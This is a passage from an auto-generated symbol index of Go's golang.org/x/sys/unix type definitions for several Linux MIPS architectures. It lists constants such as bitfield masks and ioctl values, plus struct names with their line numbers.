| CBitFieldMaskBit7 = 0x100000000000000 constant CBitFieldMaskBit8 (line 354) | CBitFieldMaskBit8 = 0x80000000000000 constant CBitFieldMaskBit9 (line 355) | CBitFieldMaskBit9 = 0x40000000000000 constant CBitFieldMaskBit10 (line 356) | CBitFieldMaskBit10 = 0x20000000000000 constant CBitFieldMaskBit11 (line 357) | CBitFieldMaskBit11 = 0x10000000000000 constant CBitFieldMaskBit12 (line 358) | CBitFieldMaskBit12 = 0x8000000000000 constant CBitFieldMaskBit13 (line 359) | CBitFieldMaskBit13 = 0x4000000000000 constant CBitFieldMaskBit14 (line 360) | CBitFieldMaskBit14 = 0x2000000000000 constant CBitFieldMaskBit15 (line 361) | CBitFieldMaskBit15 = 0x1000000000000 constant CBitFieldMaskBit16 (line 362) | CBitFieldMaskBit16 = 0x800000000000 constant CBitFieldMaskBit17 (line 363) | CBitFieldMaskBit17 = 0x400000000000 constant CBitFieldMaskBit18 (line 364) | CBitFieldMaskBit18 = 0x200000000000 constant CBitFieldMaskBit19 (line 365) | CBitFieldMaskBit19 = 0x100000000000 constant CBitFieldMaskBit20 (line 366) | CBitFieldMaskBit20 = 0x80000000000 constant CBitFieldMaskBit21 (line 367) | CBitFieldMaskBit21 = 0x40000000000 constant CBitFieldMaskBit22 (line 368) | CBitFieldMaskBit22 = 0x20000000000 constant CBitFieldMaskBit23 (line 369) | CBitFieldMaskBit23 = 0x10000000000 constant CBitFieldMaskBit24 (line 370) | CBitFieldMaskBit24 = 0x8000000000 constant CBitFieldMaskBit25 (line 371) | CBitFieldMaskBit25 = 0x4000000000 constant CBitFieldMaskBit26 (line 372) | CBitFieldMaskBit26 = 0x2000000000 constant CBitFieldMaskBit27 (line 373) | CBitFieldMaskBit27 = 0x1000000000 constant CBitFieldMaskBit28 (line 374) | CBitFieldMaskBit28 = 0x800000000 constant CBitFieldMaskBit29 (line 375) | CBitFieldMaskBit29 = 0x400000000 constant CBitFieldMaskBit30 (line 376) | CBitFieldMaskBit30 = 0x200000000 constant CBitFieldMaskBit31 (line 377) | CBitFieldMaskBit31 = 0x100000000 constant CBitFieldMaskBit32 (line 378) | CBitFieldMaskBit32 = 0x80000000 constant CBitFieldMaskBit33 (line 379) | CBitFieldMaskBit33 = 0x40000000 constant CBitFieldMaskBit34 (line 380) | CBitFieldMaskBit34 = 0x20000000 constant CBitFieldMaskBit35 (line 381) | CBitFieldMaskBit35 = 0x10000000 constant CBitFieldMaskBit36 (line 382) | CBitFieldMaskBit36 = 0x8000000 constant CBitFieldMaskBit37 (line 383) | CBitFieldMaskBit37 = 0x4000000 constant CBitFieldMaskBit38 (line 384) | CBitFieldMaskBit38 = 0x2000000 constant CBitFieldMaskBit39 (line 385) | CBitFieldMaskBit39 = 0x1000000 constant CBitFieldMaskBit40 (line 386) | CBitFieldMaskBit40 = 0x800000 constant CBitFieldMaskBit41 (line 387) | CBitFieldMaskBit41 = 0x400000 constant CBitFieldMaskBit42 (line 388) | CBitFieldMaskBit42 = 0x200000 constant CBitFieldMaskBit43 (line 389) | CBitFieldMaskBit43 = 0x100000 constant CBitFieldMaskBit44 (line 390) | CBitFieldMaskBit44 = 0x80000 constant CBitFieldMaskBit45 (line 391) | CBitFieldMaskBit45 = 0x40000 constant CBitFieldMaskBit46 (line 392) | CBitFieldMaskBit46 = 0x20000 constant CBitFieldMaskBit47 (line 393) | CBitFieldMaskBit47 = 0x10000 constant CBitFieldMaskBit48 (line 394) | CBitFieldMaskBit48 = 0x8000 constant CBitFieldMaskBit49 (line 395) | CBitFieldMaskBit49 = 0x4000 constant CBitFieldMaskBit50 (line 396) | CBitFieldMaskBit50 = 0x2000 constant CBitFieldMaskBit51 (line 397) | CBitFieldMaskBit51 = 0x1000 constant CBitFieldMaskBit52 (line 398) | CBitFieldMaskBit52 = 0x800 constant CBitFieldMaskBit53 (line 399) | CBitFieldMaskBit53 = 0x400 constant CBitFieldMaskBit54 (line 400) | CBitFieldMaskBit54 = 0x200 constant CBitFieldMaskBit55 (line 401) | CBitFieldMaskBit55 = 0x100 constant CBitFieldMaskBit56 (line 402) | CBitFieldMaskBit56 = 0x80 constant CBitFieldMaskBit57 (line 403) | CBitFieldMaskBit57 = 0x40 constant CBitFieldMaskBit58 (line 404) | CBitFieldMaskBit58 = 0x20 constant CBitFieldMaskBit59 (line 405) | CBitFieldMaskBit59 = 0x10 constant CBitFieldMaskBit60 (line 406) | CBitFieldMaskBit60 = 0x8 constant CBitFieldMaskBit61 (line 407) | CBitFieldMaskBit61 = 0x4 constant CBitFieldMaskBit62 (line 408) | CBitFieldMaskBit62 = 0x2 constant CBitFieldMaskBit63 (line 409) | CBitFieldMaskBit63 = 0x1 type SockaddrStorage (line 412) | type SockaddrStorage struct type HDGeometry (line 418) | type HDGeometry struct type Statfs_t (line 425) | type Statfs_t struct type TpacketHdr (line 442) | type TpacketHdr struct constant SizeofTpacketHdr (line 453) | SizeofTpacketHdr = 0x18 type RTCPLLInfo (line 456) | type RTCPLLInfo struct type BlkpgPartition (line 466) | type BlkpgPartition struct constant BLKPG (line 476) | BLKPG = 0x20001269 type XDPUmemReg (line 479) | type XDPUmemReg struct type CryptoUserAlg (line 488) | type CryptoUserAlg struct type CryptoStatAEAD (line 498) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 507) | type CryptoStatAKCipher struct type CryptoStatCipher (line 518) | type CryptoStatCipher struct type CryptoStatCompress (line 527) | type CryptoStatCompress struct type CryptoStatHash (line 536) | type CryptoStatHash struct type CryptoStatKPP (line 543) | type CryptoStatKPP struct type CryptoStatRNG (line 551) | type CryptoStatRNG struct type CryptoStatLarval (line 559) | type CryptoStatLarval struct type CryptoReportLarval (line 563) | type CryptoReportLarval struct type CryptoReportHash (line 567) | type CryptoReportHash struct type CryptoReportCipher (line 573) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 580) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 589) | type CryptoReportAEAD struct type CryptoReportComp (line 597) | type CryptoReportComp struct type CryptoReportRNG (line 601) | type CryptoReportRNG struct type CryptoReportAKCipher (line 606) | type CryptoReportAKCipher struct type CryptoReportKPP (line 610) | type CryptoReportKPP struct type CryptoReportAcomp (line 614) | type CryptoReportAcomp struct type LoopInfo (line 618) | type LoopInfo struct type TIPCSubscr (line 633) | type TIPCSubscr struct type TIPCSIOCLNReq (line 640) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 646) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 651) | type PPSKInfo struct constant PPS_GETPARAMS (line 661) | PPS_GETPARAMS = 0x400470a1 constant PPS_SETPARAMS (line 662) | PPS_SETPARAMS = 0x800470a2 constant PPS_GETCAP (line 663) | PPS_GETCAP = 0x400470a3 constant PPS_FETCH (line 664) | PPS_FETCH = 0xc00470a4 constant PIDFD_NONBLOCK (line 668) | PIDFD_NONBLOCK = 0x80 type SysvIpcPerm (line 671) | type SysvIpcPerm struct type SysvShmDesc (line 684) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_mips64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofLong (line 10) | SizeofLong = 0x8 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 103) | type Dirent struct type Flock_t (line 112) | type Flock_t struct type DmNameList (line 121) | type DmNameList struct constant FADV_DONTNEED (line 129) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 130) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 133) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 144) | type RawSockaddr struct type RawSockaddrAny (line 149) | type RawSockaddrAny struct type Iovec (line 154) | type Iovec struct type Msghdr (line 159) | type Msghdr struct type Cmsghdr (line 170) | type Cmsghdr struct type ifreq (line 176) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 182) | SizeofSockaddrNFCLLCP = 0x60 constant SizeofIovec (line 183) | SizeofIovec = 0x10 constant SizeofMsghdr (line 184) | SizeofMsghdr = 0x38 constant SizeofCmsghdr (line 185) | SizeofCmsghdr = 0x10 constant SizeofSockFprog (line 189) | SizeofSockFprog = 0x10 type PtraceRegs (line 192) | type PtraceRegs struct type FdSet (line 202) | type FdSet struct type Sysinfo_t (line 206) | type Sysinfo_t struct type Ustat_t (line 224) | type Ustat_t struct type EpollEvent (line 232) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 240) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 244) | POLLRDHUP = 0x2000 type Sigset_t (line 247) | type Sigset_t struct constant _C__NSIG (line 251) | _C__NSIG = 0x80 constant SIG_BLOCK (line 254) | SIG_BLOCK = 0x1 constant SIG_UNBLOCK (line 255) | SIG_UNBLOCK = 0x2 constant SIG_SETMASK (line 256) | SIG_SETMASK = 0x3 type Siginfo (line 259) | type Siginfo struct type Termios (line 267) | type Termios struct type Taskstats (line 278) | type Taskstats struct type cpuMask (line 338) | type cpuMask constant _NCPUBITS (line 341) | _NCPUBITS = 0x40 constant CBitFieldMaskBit0 (line 345) | CBitFieldMaskBit0 = 0x8000000000000000 constant CBitFieldMaskBit1 (line 346) | CBitFieldMaskBit1 = 0x4000000000000000 constant CBitFieldMaskBit2 (line 347) | CBitFieldMaskBit2 = 0x2000000000000000 constant CBitFieldMaskBit3 (line 348) | CBitFieldMaskBit3 = 0x1000000000000000 constant CBitFieldMaskBit4 (line 349) | CBitFieldMaskBit4 = 0x800000000000000 constant CBitFieldMaskBit5 (line 350) | CBitFieldMaskBit5 = 0x400000000000000 constant CBitFieldMaskBit6 (line 351) | CBitFieldMaskBit6 = 0x200000000000000 constant CBitFieldMaskBit7 (line 352) | CBitFieldMaskBit7 = 0x100000000000000 constant CBitFieldMaskBit8 (line 353) | CBitFieldMaskBit8 = 0x80000000000000 constant CBitFieldMaskBit9 (line 354) | CBitFieldMaskBit9 = 0x40000000000000 constant CBitFieldMaskBit10 (line 355) | CBitFieldMaskBit10 = 0x20000000000000 constant CBitFieldMaskBit11 (line 356) | CBitFieldMaskBit11 = 0x10000000000000 constant CBitFieldMaskBit12 (line 357) | CBitFieldMaskBit12 = 0x8000000000000 constant CBitFieldMaskBit13 (line 358) | CBitFieldMaskBit13 = 0x4000000000000 constant CBitFieldMaskBit14 (line 359) | CBitFieldMaskBit14 = 0x2000000000000 constant CBitFieldMaskBit15 (line 360) | CBitFieldMaskBit15 = 0x1000000000000 constant CBitFieldMaskBit16 (line 361) | CBitFieldMaskBit16 = 0x800000000000 constant CBitFieldMaskBit17 (line 362) | CBitFieldMaskBit17 = 0x400000000000 constant CBitFieldMaskBit18 (line 363) | CBitFieldMaskBit18 = 0x200000000000 constant CBitFieldMaskBit19 (line 364) | CBitFieldMaskBit19 = 0x100000000000 constant CBitFieldMaskBit20 (line 365) | CBitFieldMaskBit20 = 0x80000000000 constant CBitFieldMaskBit21 (line 366) | CBitFieldMaskBit21 = 0x40000000000 constant CBitFieldMaskBit22 (line 367) | CBitFieldMaskBit22 = 0x20000000000 constant CBitFieldMaskBit23 (line 368) | CBitFieldMaskBit23 = 0x10000000000 constant CBitFieldMaskBit24 (line 369) | CBitFieldMaskBit24 = 0x8000000000 constant CBitFieldMaskBit25 (line 370) | CBitFieldMaskBit25 = 0x4000000000 constant CBitFieldMaskBit26 (line 371) | CBitFieldMaskBit26 = 0x2000000000 constant CBitFieldMaskBit27 (line 372) | CBitFieldMaskBit27 = 0x1000000000 constant CBitFieldMaskBit28 (line 373) | CBitFieldMaskBit28 = 0x800000000 constant CBitFieldMaskBit29 (line 374) | CBitFieldMaskBit29 = 0x400000000 constant CBitFieldMaskBit30 (line 375) | CBitFieldMaskBit30 = 0x200000000 constant CBitFieldMaskBit31 (line 376) | CBitFieldMaskBit31 = 0x100000000 constant CBitFieldMaskBit32 (line 377) | CBitFieldMaskBit32 = 0x80000000 constant CBitFieldMaskBit33 (line 378) | CBitFieldMaskBit33 = 0x40000000 constant CBitFieldMaskBit34 (line 379) | CBitFieldMaskBit34 = 0x20000000 constant CBitFieldMaskBit35 (line 380) | CBitFieldMaskBit35 = 0x10000000 constant CBitFieldMaskBit36 (line 381) | CBitFieldMaskBit36 = 0x8000000 constant CBitFieldMaskBit37 (line 382) | CBitFieldMaskBit37 = 0x4000000 constant CBitFieldMaskBit38 (line 383) | CBitFieldMaskBit38 = 0x2000000 constant CBitFieldMaskBit39 (line 384) | CBitFieldMaskBit39 = 0x1000000 constant CBitFieldMaskBit40 (line 385) | CBitFieldMaskBit40 = 0x800000 constant CBitFieldMaskBit41 (line 386) | CBitFieldMaskBit41 = 0x400000 constant CBitFieldMaskBit42 (line 387) | CBitFieldMaskBit42 = 0x200000 constant CBitFieldMaskBit43 (line 388) | CBitFieldMaskBit43 = 0x100000 constant CBitFieldMaskBit44 (line 389) | CBitFieldMaskBit44 = 0x80000 constant CBitFieldMaskBit45 (line 390) | CBitFieldMaskBit45 = 0x40000 constant CBitFieldMaskBit46 (line 391) | CBitFieldMaskBit46 = 0x20000 constant CBitFieldMaskBit47 (line 392) | CBitFieldMaskBit47 = 0x10000 constant CBitFieldMaskBit48 (line 393) | CBitFieldMaskBit48 = 0x8000 constant CBitFieldMaskBit49 (line 394) | CBitFieldMaskBit49 = 0x4000 constant CBitFieldMaskBit50 (line 395) | CBitFieldMaskBit50 = 0x2000 constant CBitFieldMaskBit51 (line 396) | CBitFieldMaskBit51 = 0x1000 constant CBitFieldMaskBit52 (line 397) | CBitFieldMaskBit52 = 0x800 constant CBitFieldMaskBit53 (line 398) | CBitFieldMaskBit53 = 0x400 constant CBitFieldMaskBit54 (line 399) | CBitFieldMaskBit54 = 0x200 constant CBitFieldMaskBit55 (line 400) | CBitFieldMaskBit55 = 0x100 constant CBitFieldMaskBit56 (line 401) | CBitFieldMaskBit56 = 0x80 constant CBitFieldMaskBit57 (line 402) | CBitFieldMaskBit57 = 0x40 constant CBitFieldMaskBit58 (line 403) | CBitFieldMaskBit58 = 0x20 constant CBitFieldMaskBit59 (line 404) | CBitFieldMaskBit59 = 0x10 constant CBitFieldMaskBit60 (line 405) | CBitFieldMaskBit60 = 0x8 constant CBitFieldMaskBit61 (line 406) | CBitFieldMaskBit61 = 0x4 constant CBitFieldMaskBit62 (line 407) | CBitFieldMaskBit62 = 0x2 constant CBitFieldMaskBit63 (line 408) | CBitFieldMaskBit63 = 0x1 type SockaddrStorage (line 411) | type SockaddrStorage struct type HDGeometry (line 417) | type HDGeometry struct type Statfs_t (line 424) | type Statfs_t struct type TpacketHdr (line 439) | type TpacketHdr struct constant SizeofTpacketHdr (line 451) | SizeofTpacketHdr = 0x20 type RTCPLLInfo (line 454) | type RTCPLLInfo struct type BlkpgPartition (line 464) | type BlkpgPartition struct constant BLKPG (line 474) | BLKPG = 0x20001269 type XDPUmemReg (line 477) | type XDPUmemReg struct type CryptoUserAlg (line 486) | type CryptoUserAlg struct type CryptoStatAEAD (line 496) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 505) | type CryptoStatAKCipher struct type CryptoStatCipher (line 516) | type CryptoStatCipher struct type CryptoStatCompress (line 525) | type CryptoStatCompress struct type CryptoStatHash (line 534) | type CryptoStatHash struct type CryptoStatKPP (line 541) | type CryptoStatKPP struct type CryptoStatRNG (line 549) | type CryptoStatRNG struct type CryptoStatLarval (line 557) | type CryptoStatLarval struct type CryptoReportLarval (line 561) | type CryptoReportLarval struct type CryptoReportHash (line 565) | type CryptoReportHash struct type CryptoReportCipher (line 571) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 578) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 587) | type CryptoReportAEAD struct type CryptoReportComp (line 595) | type CryptoReportComp struct type CryptoReportRNG (line 599) | type CryptoReportRNG struct type CryptoReportAKCipher (line 604) | type CryptoReportAKCipher struct type CryptoReportKPP (line 608) | type CryptoReportKPP struct type CryptoReportAcomp (line 612) | type CryptoReportAcomp struct type LoopInfo (line 616) | type LoopInfo struct type TIPCSubscr (line 632) | type TIPCSubscr struct type TIPCSIOCLNReq (line 639) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 645) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 650) | type PPSKInfo struct constant PPS_GETPARAMS (line 660) | PPS_GETPARAMS = 0x400870a1 constant PPS_SETPARAMS (line 661) | PPS_SETPARAMS = 0x800870a2 constant PPS_GETCAP (line 662) | PPS_GETCAP = 0x400870a3 constant PPS_FETCH (line 663) | PPS_FETCH = 0xc00870a4 constant PIDFD_NONBLOCK (line 667) | PIDFD_NONBLOCK = 0x80 type SysvIpcPerm (line 670) | type SysvIpcPerm struct type SysvShmDesc (line 683) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_mips64le.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofLong (line 10) | SizeofLong = 0x8 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 103) | type Dirent struct type Flock_t (line 112) | type Flock_t struct type DmNameList (line 121) | type DmNameList struct constant FADV_DONTNEED (line 129) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 130) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 133) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 144) | type RawSockaddr struct type RawSockaddrAny (line 149) | type RawSockaddrAny struct type Iovec (line 154) | type Iovec struct type Msghdr (line 159) | type Msghdr struct type Cmsghdr (line 170) | type Cmsghdr struct type ifreq (line 176) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 182) | SizeofSockaddrNFCLLCP = 0x60 constant SizeofIovec (line 183) | SizeofIovec = 0x10 constant SizeofMsghdr (line 184) | SizeofMsghdr = 0x38 constant SizeofCmsghdr (line 185) | SizeofCmsghdr = 0x10 constant SizeofSockFprog (line 189) | SizeofSockFprog = 0x10 type PtraceRegs (line 192) | type PtraceRegs struct type FdSet (line 202) | type FdSet struct type Sysinfo_t (line 206) | type Sysinfo_t struct type Ustat_t (line 224) | type Ustat_t struct type EpollEvent (line 232) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 240) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 244) | POLLRDHUP = 0x2000 type Sigset_t (line 247) | type Sigset_t struct constant _C__NSIG (line 251) | _C__NSIG = 0x80 constant SIG_BLOCK (line 254) | SIG_BLOCK = 0x1 constant SIG_UNBLOCK (line 255) | SIG_UNBLOCK = 0x2 constant SIG_SETMASK (line 256) | SIG_SETMASK = 0x3 type Siginfo (line 259) | type Siginfo struct type Termios (line 267) | type Termios struct type Taskstats (line 278) | type Taskstats struct type cpuMask (line 338) | type cpuMask constant _NCPUBITS (line 341) | _NCPUBITS = 0x40 constant CBitFieldMaskBit0 (line 345) | CBitFieldMaskBit0 = 0x1 constant CBitFieldMaskBit1 (line 346) | CBitFieldMaskBit1 = 0x2 constant CBitFieldMaskBit2 (line 347) | CBitFieldMaskBit2 = 0x4 constant CBitFieldMaskBit3 (line 348) | CBitFieldMaskBit3 = 0x8 constant CBitFieldMaskBit4 (line 349) | CBitFieldMaskBit4 = 0x10 constant CBitFieldMaskBit5 (line 350) | CBitFieldMaskBit5 = 0x20 constant CBitFieldMaskBit6 (line 351) | CBitFieldMaskBit6 = 0x40 constant CBitFieldMaskBit7 (line 352) | CBitFieldMaskBit7 = 0x80 constant CBitFieldMaskBit8 (line 353) | CBitFieldMaskBit8 = 0x100 constant CBitFieldMaskBit9 (line 354) | CBitFieldMaskBit9 = 0x200 constant CBitFieldMaskBit10 (line 355) | CBitFieldMaskBit10 = 0x400 constant CBitFieldMaskBit11 (line 356) | CBitFieldMaskBit11 = 0x800 constant CBitFieldMaskBit12 (line 357) | CBitFieldMaskBit12 = 0x1000 constant CBitFieldMaskBit13 (line 358) | CBitFieldMaskBit13 = 0x2000 constant CBitFieldMaskBit14 (line 359) | CBitFieldMaskBit14 = 0x4000 constant CBitFieldMaskBit15 (line 360) | CBitFieldMaskBit15 = 0x8000 constant CBitFieldMaskBit16 (line 361) | CBitFieldMaskBit16 = 0x10000 constant CBitFieldMaskBit17 (line 362) | CBitFieldMaskBit17 = 0x20000 constant CBitFieldMaskBit18 (line 363) | CBitFieldMaskBit18 = 0x40000 constant CBitFieldMaskBit19 (line 364) | CBitFieldMaskBit19 = 0x80000 constant CBitFieldMaskBit20 (line 365) | CBitFieldMaskBit20 = 0x100000 constant CBitFieldMaskBit21 (line 366) | CBitFieldMaskBit21 = 0x200000 constant CBitFieldMaskBit22 (line 367) | CBitFieldMaskBit22 = 0x400000 constant CBitFieldMaskBit23 (line 368) | CBitFieldMaskBit23 = 0x800000 constant CBitFieldMaskBit24 (line 369) | CBitFieldMaskBit24 = 0x1000000 constant CBitFieldMaskBit25 (line 370) | CBitFieldMaskBit25 = 0x2000000 constant CBitFieldMaskBit26 (line 371) | CBitFieldMaskBit26 = 0x4000000 constant CBitFieldMaskBit27 (line 372) | CBitFieldMaskBit27 = 0x8000000 constant CBitFieldMaskBit28 (line 373) | CBitFieldMaskBit28 = 0x10000000 constant CBitFieldMaskBit29 (line 374) | CBitFieldMaskBit29 = 0x20000000 constant CBitFieldMaskBit30 (line 375) | CBitFieldMaskBit30 = 0x40000000 constant CBitFieldMaskBit31 (line 376) | CBitFieldMaskBit31 = 0x80000000 constant CBitFieldMaskBit32 (line 377) | CBitFieldMaskBit32 = 0x100000000 constant CBitFieldMaskBit33 (line 378) | CBitFieldMaskBit33 = 0x200000000 constant CBitFieldMaskBit34 (line 379) | CBitFieldMaskBit34 = 0x400000000 constant CBitFieldMaskBit35 (line 380) | CBitFieldMaskBit35 = 0x800000000 constant CBitFieldMaskBit36 (line 381) | CBitFieldMaskBit36 = 0x1000000000 constant CBitFieldMaskBit37 (line 382) | CBitFieldMaskBit37 = 0x2000000000 constant CBitFieldMaskBit38 (line 383) | CBitFieldMaskBit38 = 0x4000000000 constant CBitFieldMaskBit39 (line 384) | CBitFieldMaskBit39 = 0x8000000000 constant CBitFieldMaskBit40 (line 385) | CBitFieldMaskBit40 = 0x10000000000 constant CBitFieldMaskBit41 (line 386) | CBitFieldMaskBit41 = 0x20000000000 constant CBitFieldMaskBit42 (line 387) | CBitFieldMaskBit42 = 0x40000000000 constant CBitFieldMaskBit43 (line 388) | CBitFieldMaskBit43 = 0x80000000000 constant CBitFieldMaskBit44 (line 389) | CBitFieldMaskBit44 = 0x100000000000 constant CBitFieldMaskBit45 (line 390) | CBitFieldMaskBit45 = 0x200000000000 constant CBitFieldMaskBit46 (line 391) | CBitFieldMaskBit46 = 0x400000000000 constant CBitFieldMaskBit47 (line 392) | CBitFieldMaskBit47 = 0x800000000000 constant CBitFieldMaskBit48 (line 393) | CBitFieldMaskBit48 = 0x1000000000000 constant CBitFieldMaskBit49 (line 394) | CBitFieldMaskBit49 = 0x2000000000000 constant CBitFieldMaskBit50 (line 395) | CBitFieldMaskBit50 = 0x4000000000000 constant CBitFieldMaskBit51 (line 396) | CBitFieldMaskBit51 = 0x8000000000000 constant CBitFieldMaskBit52 (line 397) | CBitFieldMaskBit52 = 0x10000000000000 constant CBitFieldMaskBit53 (line 398) | CBitFieldMaskBit53 = 0x20000000000000 constant CBitFieldMaskBit54 (line 399) | CBitFieldMaskBit54 = 0x40000000000000 constant CBitFieldMaskBit55 (line 400) | CBitFieldMaskBit55 = 0x80000000000000 constant CBitFieldMaskBit56 (line 401) | CBitFieldMaskBit56 = 0x100000000000000 constant CBitFieldMaskBit57 (line 402) | CBitFieldMaskBit57 = 0x200000000000000 constant CBitFieldMaskBit58 (line 403) | CBitFieldMaskBit58 = 0x400000000000000 constant CBitFieldMaskBit59 (line 404) | CBitFieldMaskBit59 = 0x800000000000000 constant CBitFieldMaskBit60 (line 405) | CBitFieldMaskBit60 = 0x1000000000000000 constant CBitFieldMaskBit61 (line 406) | CBitFieldMaskBit61 = 0x2000000000000000 constant CBitFieldMaskBit62 (line 407) | CBitFieldMaskBit62 = 0x4000000000000000 constant CBitFieldMaskBit63 (line 408) | CBitFieldMaskBit63 = 0x8000000000000000 type SockaddrStorage (line 411) | type SockaddrStorage struct type HDGeometry (line 417) | type HDGeometry struct type Statfs_t (line 424) | type Statfs_t struct type TpacketHdr (line 439) | type TpacketHdr struct constant SizeofTpacketHdr (line 451) | SizeofTpacketHdr = 0x20 type RTCPLLInfo (line 454) | type RTCPLLInfo struct type BlkpgPartition (line 464) | type BlkpgPartition struct constant BLKPG (line 474) | BLKPG = 0x20001269 type XDPUmemReg (line 477) | type XDPUmemReg struct type CryptoUserAlg (line 486) | type CryptoUserAlg struct type CryptoStatAEAD (line 496) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 505) | type CryptoStatAKCipher struct type CryptoStatCipher (line 516) | type CryptoStatCipher struct type CryptoStatCompress (line 525) | type CryptoStatCompress struct type CryptoStatHash (line 534) | type CryptoStatHash struct type CryptoStatKPP (line 541) | type CryptoStatKPP struct type CryptoStatRNG (line 549) | type CryptoStatRNG struct type CryptoStatLarval (line 557) | type CryptoStatLarval struct type CryptoReportLarval (line 561) | type CryptoReportLarval struct type CryptoReportHash (line 565) | type CryptoReportHash struct type CryptoReportCipher (line 571) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 578) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 587) | type CryptoReportAEAD struct type CryptoReportComp (line 595) | type CryptoReportComp struct type CryptoReportRNG (line 599) | type CryptoReportRNG struct type CryptoReportAKCipher (line 604) | type CryptoReportAKCipher struct type CryptoReportKPP (line 608) | type CryptoReportKPP struct type CryptoReportAcomp (line 612) | type CryptoReportAcomp struct type LoopInfo (line 616) | type LoopInfo struct type TIPCSubscr (line 632) | type TIPCSubscr struct type TIPCSIOCLNReq (line 639) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 645) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 650) | type PPSKInfo struct constant PPS_GETPARAMS (line 660) | PPS_GETPARAMS = 0x400870a1 constant PPS_SETPARAMS (line 661) | PPS_SETPARAMS = 0x800870a2 constant PPS_GETCAP (line 662) | PPS_GETCAP = 0x400870a3 constant PPS_FETCH (line 663) | PPS_FETCH = 0xc00870a4 constant PIDFD_NONBLOCK (line 667) | PIDFD_NONBLOCK = 0x80 type SysvIpcPerm (line 670) | type SysvIpcPerm struct type SysvShmDesc (line 683) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_mipsle.go constant SizeofPtr (line 9) | SizeofPtr = 0x4 constant SizeofLong (line 10) | SizeofLong = 0x4 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 104) | type Dirent struct type Flock_t (line 113) | type Flock_t struct type DmNameList (line 123) | type DmNameList struct constant FADV_DONTNEED (line 131) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 132) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 135) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 146) | type RawSockaddr struct type RawSockaddrAny (line 151) | type RawSockaddrAny struct type Iovec (line 156) | type Iovec struct type Msghdr (line 161) | type Msghdr struct type Cmsghdr (line 171) | type Cmsghdr struct type ifreq (line 177) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 183) | SizeofSockaddrNFCLLCP = 0x58 constant SizeofIovec (line 184) | SizeofIovec = 0x8 constant SizeofMsghdr (line 185) | SizeofMsghdr = 0x1c constant SizeofCmsghdr (line 186) | SizeofCmsghdr = 0xc constant SizeofSockFprog (line 190) | SizeofSockFprog = 0x8 type PtraceRegs (line 193) | type PtraceRegs struct type FdSet (line 203) | type FdSet struct type Sysinfo_t (line 207) | type Sysinfo_t struct type Ustat_t (line 224) | type Ustat_t struct type EpollEvent (line 231) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 239) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 243) | POLLRDHUP = 0x2000 type Sigset_t (line 246) | type Sigset_t struct constant _C__NSIG (line 250) | _C__NSIG = 0x80 constant SIG_BLOCK (line 253) | SIG_BLOCK = 0x1 constant SIG_UNBLOCK (line 254) | SIG_UNBLOCK = 0x2 constant SIG_SETMASK (line 255) | SIG_SETMASK = 0x3 type Siginfo (line 258) | type Siginfo struct type Termios (line 265) | type Termios struct type Taskstats (line 276) | type Taskstats struct type cpuMask (line 339) | type cpuMask constant _NCPUBITS (line 342) | _NCPUBITS = 0x20 constant CBitFieldMaskBit0 (line 346) | CBitFieldMaskBit0 = 0x1 constant CBitFieldMaskBit1 (line 347) | CBitFieldMaskBit1 = 0x2 constant CBitFieldMaskBit2 (line 348) | CBitFieldMaskBit2 = 0x4 constant CBitFieldMaskBit3 (line 349) | CBitFieldMaskBit3 = 0x8 constant CBitFieldMaskBit4 (line 350) | CBitFieldMaskBit4 = 0x10 constant CBitFieldMaskBit5 (line 351) | CBitFieldMaskBit5 = 0x20 constant 